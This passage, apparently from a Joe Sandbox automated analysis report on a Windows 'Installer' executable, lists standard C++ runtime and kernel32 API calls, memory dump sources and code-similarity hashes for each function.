                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00350D7F
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00350E08
                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00350E33
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00350E88
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: 406eedddefbeb9d7833c3e61e7851ba5f887be0c758b904aa1bfcef0362fc9b8
                                                                                                                                                                                                                                                    • Instruction ID: c6287b19c1afe775174186bed26e7265ea659ccbdde235811069c73e79348750
• Opcode Fuzzy Hash: 406eedddefbeb9d7833c3e61e7851ba5f887be0c758b904aa1bfcef0362fc9b8
• Instruction Fuzzy Hash: 50410534A006189BCF17DF68C886E9EBBF5AF45311F258455ED186F362D732AD09CB90
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00343CA5
• std::_Lockit::_Lockit.LIBCPMT ref: 00343CBF
• std::_Lockit::~_Lockit.LIBCPMT ref: 00343CE0
• __Getctype.LIBCPMT ref: 00343D92
• std::_Lockit::~_Lockit.LIBCPMT ref: 00343DD8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
• String ID: e.7
• API String ID: 3087743877-48725242
• Opcode ID: fa4c0a74e6552e1fd20f88fc2150d683e2dbbfc2cd04b1e3dd19bb4c7153ffb4
• Instruction ID: 5f421ebfc39ebd575b3ee4ae95ba7811c64cb0905f9056809b7b848e2f241394
• Opcode Fuzzy Hash: fa4c0a74e6552e1fd20f88fc2150d683e2dbbfc2cd04b1e3dd19bb4c7153ffb4
• Instruction Fuzzy Hash: 43412471E006188FCB26DF98D845BAEB7F5BB88720F058219D8196F391DB35AA41CF91
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00350086
• GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00350094
• GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 003500A5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
• API String ID: 667068680-1047828073
• Opcode ID: a78279016db0e105796bff3dfa2a4c3ccc38c584e7334cb60eb4e52104d03210
• Instruction ID: 22bb88bbdf0eaba090eb5ed19d01c28d6ce326d76497271f9966139a2d351e1a
• Opcode Fuzzy Hash: a78279016db0e105796bff3dfa2a4c3ccc38c584e7334cb60eb4e52104d03210
• Instruction Fuzzy Hash: 48D05E31515611AB83336F747C0A8CD3AACFB09700B018066F40CD2250DB7846808B55
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 856799895473ea6ae34872771784cb266eae7415808e96b48123efac33ce3fb4
• Instruction ID: 2c30dbdd3e1e02bb5f2b1b9648e6e84977140788c8a023917e60d7d0a364c5bd
• Opcode Fuzzy Hash: 856799895473ea6ae34872771784cb266eae7415808e96b48123efac33ce3fb4
• Instruction Fuzzy Hash: FFB13974E08A499FDF13CFA8D851FADBBB4BF45304F148168E9056B396C7709941CBA0
APIs
• std::_Throw_Cpp_error.LIBCPMT ref: 00349C97
• std::_Throw_Cpp_error.LIBCPMT ref: 00349CA8
• std::_Throw_Cpp_error.LIBCPMT ref: 00349CBC
• std::_Throw_Cpp_error.LIBCPMT ref: 00349CDD
• std::_Throw_Cpp_error.LIBCPMT ref: 00349CEE
• std::_Throw_Cpp_error.LIBCPMT ref: 00349D06
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: Cpp_errorThrow_std::_
• String ID:
• API String ID: 2134207285-0
• Opcode ID: 76200910d99c365ff2498cc334091e5a7efee250a1174041ce7995431ac5614f
• Instruction ID: 5853e9132e6275034fc5f4a4bc11d36b1f584bec4b84c4415866b5376c419cd4
• Opcode Fuzzy Hash: 76200910d99c365ff2498cc334091e5a7efee250a1174041ce7995431ac5614f
• Instruction Fuzzy Hash: E641B0B5900740CBDB329F658946BABB7F8BF45320F18062ED57A2E2D1D771B904CB92
APIs
• GetLastError.KERNEL32(?,?,0035ACDE,00350760,0034B77F,C82EE5EC,?,?,?,?,0036BFCA,000000FF), ref: 0035ACF5
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0035AD03
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0035AD1C
• SetLastError.KERNEL32(00000000,?,0035ACDE,00350760,0034B77F,C82EE5EC,?,?,?,?,0036BFCA,000000FF), ref: 0035AD6E
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                                                                    • Opcode ID: efb2d11428259a0af732f378e666f67d81673f9088b2a7f24c333f6af57f75bd
                                                                                                                                                                                                                                                    • Instruction ID: 14e43dcd9a7b5f8a5cedc4bbc4128f24ee9c6e686fbe45b3b95638d79b7185c0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: efb2d11428259a0af732f378e666f67d81673f9088b2a7f24c333f6af57f75bd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E01F932205A159EE73736746C96D2666F8EB01B73B20032EFA24565F0EF1148466181
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 0035B68D
                                                                                                                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 0035B906
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                    • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                                    • Opcode ID: fe3f23b679737297d50f6660df1160e663a97c94e48bfde1471e24d26748cb9a
                                                                                                                                                                                                                                                    • Instruction ID: e6d74ff29051f218c6f1ecf89e93e4d02282d616f5121435d9f7b79ddc995546
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe3f23b679737297d50f6660df1160e663a97c94e48bfde1471e24d26748cb9a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24B14871800209EFCF1ADFA4C881DAEB7B9BF04312F16455AEC11AB222D731DA59DB91
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Ref_count_base::_Decref.LIBCPMT ref: 0034BF44
                                                                                                                                                                                                                                                    • std::_Ref_count_base::_Decref.LIBCPMT ref: 0034C028
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DecrefRef_count_base::_std::_
                                                                                                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                                    • API String ID: 1456557076-2671469338
                                                                                                                                                                                                                                                    • Opcode ID: 5e0badc20e3f147ee4c3a60a2e97ea358d97d9bf9032dcfff77f6085ce3c1ecf
                                                                                                                                                                                                                                                    • Instruction ID: 7c14c02b99a1ba0353c90b5d36609c42d46d2b1127f6db6f30b5955878be6de1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e0badc20e3f147ee4c3a60a2e97ea358d97d9bf9032dcfff77f6085ce3c1ecf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A7418974900209DFCB2ADF68C9459ADF7F9AF48300B59805DE44AAF652C734FA49CB52
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,C82EE5EC,?,?,00000000,0036BE94,000000FF,?,00355685,00000002,?,00355721,00358396), ref: 003555F9
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0035560B
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,0036BE94,000000FF,?,00355685,00000002,?,00355721,00358396), ref: 0035562D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                    • Opcode ID: 5aba878caad82e3e92ef3dcc4e135e6b9babfc44f3b0f01c735265b554f8f78d
                                                                                                                                                                                                                                                    • Instruction ID: 9ca96c35f5db8de7898aaacfd38ee1185af3acd93c890fd304eff3a5ecef789c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5aba878caad82e3e92ef3dcc4e135e6b9babfc44f3b0f01c735265b554f8f78d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F01DB31600A55AFDB239F44DC15FEEB7BCFB04715F014525F815A22A0DB789944CA50
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0035D76F
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0035D838
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 0035D89F
                                                                                                                                                                                                                                                      • Part of subcall function 0035BF11: RtlAllocateHeap.NTDLL(00000000,0035DF35,?,?,0035DF35,00000220,?,00000000,?), ref: 0035BF43
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 0035D8B2
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 0035D8BF
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: __freea$__alloca_probe_16$AllocateHeap
• String ID:
• API String ID: 1423051803-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 0034F005
• AcquireSRWLockExclusive.KERNEL32(00348E38), ref: 0034F024
• AcquireSRWLockExclusive.KERNEL32(00348E38,0034A2F0,?), ref: 0034F052
• TryAcquireSRWLockExclusive.KERNEL32(00348E38,0034A2F0,?), ref: 0034F0AD
• TryAcquireSRWLockExclusive.KERNEL32(00348E38,0034A2F0,?), ref: 0034F0C4
Similarity
• API ID: AcquireExclusiveLock$CurrentThread
• String ID:
• API String ID: 66001078-0
APIs
• __EH_prolog3.LIBCMT ref: 0034D4C9
• std::_Lockit::_Lockit.LIBCPMT ref: 0034D4D3
• int.LIBCPMT ref: 0034D4EA
  • Part of subcall function 0034C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 0034C1F6
  • Part of subcall function 0034C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 0034C210
• codecvt.LIBCPMT ref: 0034D50D
• std::_Lockit::~_Lockit.LIBCPMT ref: 0034D544
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
• String ID:
• API String ID: 3716348337-0
APIs
• __EH_prolog3.LIBCMT ref: 0034ADDE
• std::_Lockit::_Lockit.LIBCPMT ref: 0034ADE9
• std::_Lockit::~_Lockit.LIBCPMT ref: 0034AE57
  • Part of subcall function 0034ACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0034ACC2
• std::locale::_Setgloballocale.LIBCPMT ref: 0034AE04
• _Yarn.LIBCPMT ref: 0034AE1A
Similarity
• API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
• String ID:
• API String ID: 1088826258-0
APIs
  • Part of subcall function 0035C16A: GetLastError.KERNEL32(?,?,00355495,00378E38,0000000C), ref: 0035C16E
  • Part of subcall function 0035C16A: SetLastError.KERNEL32(00000000), ref: 0035C210
• GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00355BD5,?,?,?,00000055,?,-00000050,?,?,?), ref: 00360A35
• IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00355BD5,?,?,?,00000055,?,-00000050,?,?), ref: 00360A6C
Strings
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                                    • String ID: ,K7$utf8
                                                                                                                                                                                                                                                    • API String ID: 943130320-3027620799
                                                                                                                                                                                                                                                    • Opcode ID: 7057f9ce4658118f53fb5e62dfe706428c62179dc66358565548e30602049a9f
                                                                                                                                                                                                                                                    • Instruction ID: c0cd88bb7ff1007600d4696f1561263a77868e585bb3e41d1320a999012385cc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7057f9ce4658118f53fb5e62dfe706428c62179dc66358565548e30602049a9f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2651E531600705AADB2FAB71CC43FAB73A8EF05744F15C429F9499B189E6B0D9808765
APIs
• Concurrency::details::_Release_chore.LIBCPMT ref: 00347526
• ___std_exception_copy.LIBVCRUNTIME ref: 00347561
  • Part of subcall function 0034AF37: CreateThreadpoolWork.KERNEL32(0034B060,00348A2A,00000000), ref: 0034AF46
  • Part of subcall function 0034AF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 0034AF53
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Similarity
• API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
• String ID: Fail to schedule the chore!$G.7
• API String ID: 3683891980-1612208290
• Opcode ID: c1e66bb9b3862f8732a94823aea22c425f4b415a6cf4230d8cf9a19f3cb18b95
• Instruction ID: 056a8f148b1f63c92e0514928a930f5c99aa6edca77681cee2ed8d76ffa40bc0
• Opcode Fuzzy Hash: c1e66bb9b3862f8732a94823aea22c425f4b415a6cf4230d8cf9a19f3cb18b95
• Instruction Fuzzy Hash: CC519CB4D006089FCB16DF94D845BAEBBB4FF08314F144129E8196F391D779A905CF91
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00343EC6
• std::_Lockit::~_Lockit.LIBCPMT ref: 00344002
  • Part of subcall function 0034ABC5: _Yarn.LIBCPMT ref: 0034ABE5
  • Part of subcall function 0034ABC5: _Yarn.LIBCPMT ref: 0034AC09
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Similarity
• API ID: LockitYarnstd::_$Lockit::_Lockit::~_
• String ID: bad locale name$|=4e.7
• API String ID: 2070049627-3792104845
• Opcode ID: 8e09588ceb900e904defb29fb5cceadcc01b98b95b6a8846ebf14835fc17076a
• Instruction ID: 2ba9a789b8662a8e77c03fe82fbecd0ec8d3ba9ce8eae77c3f224b508da4fe3d
• Opcode Fuzzy Hash: 8e09588ceb900e904defb29fb5cceadcc01b98b95b6a8846ebf14835fc17076a
• Instruction Fuzzy Hash: CD417BF0A007459BEB21DF69C805B17BAF8BF04714F044629E8099B780E37AF518CBE2
APIs
• std::_Ref_count_base::_Decref.LIBCPMT ref: 0034B809
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Similarity
• API ID: DecrefRef_count_base::_std::_
• String ID: MOC$RCC$csm
• API String ID: 1456557076-2671469338
• Opcode ID: 3eb40265c8aaa33d8b3e23a23219dee5667495491bdde574b243586a1f46b578
• Instruction ID: 374655116d5518c8cb36017f723b649600ff578787a6511e6eab3d70465aaae2
• Opcode Fuzzy Hash: 3eb40265c8aaa33d8b3e23a23219dee5667495491bdde574b243586a1f46b578
• Instruction Fuzzy Hash: A721C235900645DFCF2A9FA4C855B6AF7ECEF44720F15491EE4528FA90DB34FA40CA81
APIs
• WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,0034253A,?,?,00000000), ref: 0034F129
• GetExitCodeThread.KERNEL32(?,00000000,?,?,0034253A,?,?,00000000), ref: 0034F142
• CloseHandle.KERNEL32(?,?,?,0034253A,?,?,00000000), ref: 0034F154
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Similarity
• API ID: CloseCodeExitHandleObjectSingleThreadWait
• String ID: :%4
• API String ID: 2551024706-536517894
• Opcode ID: d8fc0012224287f642e12f76df90227dd7af092b7e17a4e2324ffb6a1e26ceb9
• Instruction ID: 70fb550f3eebbadec9955b57b44badbee9eb634750623cca7413cc4fc69d874e
• Opcode Fuzzy Hash: d8fc0012224287f642e12f76df90227dd7af092b7e17a4e2324ffb6a1e26ceb9
• Instruction Fuzzy Hash: 2DF01971654515EFEF224F74DC06A593BA8EB01774F294320F925DA1F0D731EE41D640
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: Yarn
• String ID: e.7$|=4e.7
• API String ID: 1767336200-2368979467
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,003669DC,00000000,?,0037D2B0,?,?,?,00366913,00000004,InitializeCriticalSectionEx,00370D34,00370D3C), ref: 0036694D
• GetLastError.KERNEL32(?,003669DC,00000000,?,0037D2B0,?,?,?,00366913,00000004,InitializeCriticalSectionEx,00370D34,00370D3C,00000000,?,0035BBBC), ref: 00366957
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0036697F
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID: api-ms-
• API String ID: 3177248105-2084034818
APIs
• GetConsoleOutputCP.KERNEL32(C82EE5EC,00000000,00000000,?), ref: 00364001
  • Part of subcall function 0035C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0035D895,?,00000000,-00000008), ref: 0035C082
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00364253
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00364299
